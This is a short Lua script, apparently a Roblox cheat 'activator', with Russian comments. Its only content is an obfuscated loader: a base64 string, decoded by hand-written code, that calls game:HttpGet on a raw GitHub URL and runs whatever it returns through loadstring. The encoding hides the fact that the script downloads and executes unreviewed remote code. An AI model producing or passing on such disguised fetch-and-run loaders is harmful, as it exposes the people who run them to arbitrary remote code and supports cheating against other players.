-- Активатор с кодированием (base64)
local encodedScript = "bG9hZHN0cmluZyhnYW1lOkdldEh0dHAoImh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9zZXJlemFuZXQyL3NlcmV6YW5ldDItR0lULVNBTExJL3JlZnMvaGVhZHMvbWFpbi9NZW51LU1PRCIpKSgp"

-- Декодируем и выполняем
local decodeAndLoad = function(encoded)
    local decoded = (encoded:gsub('[^%w%+%/%=]', ''):gsub('.', function(x)
        if x == '=' then return '' end
        local r, f = '', (string.find('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/', x) - 1)
        for i = 6, 1, -1 do r = r .. (f % 2^i - f % 2^(i-1) > 0 and '1' or '0') end
        return r
    end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
        if #x ~= 8 then return '' end
        local c = 0
        for i = 1, 8 do c = c + (x:sub(i, i) == '1' and 2^(8 - i) or 0) end
        return string.char(c)
    end))
    return decoded
end

loadstring(decodeAndLoad(encodedScript))()
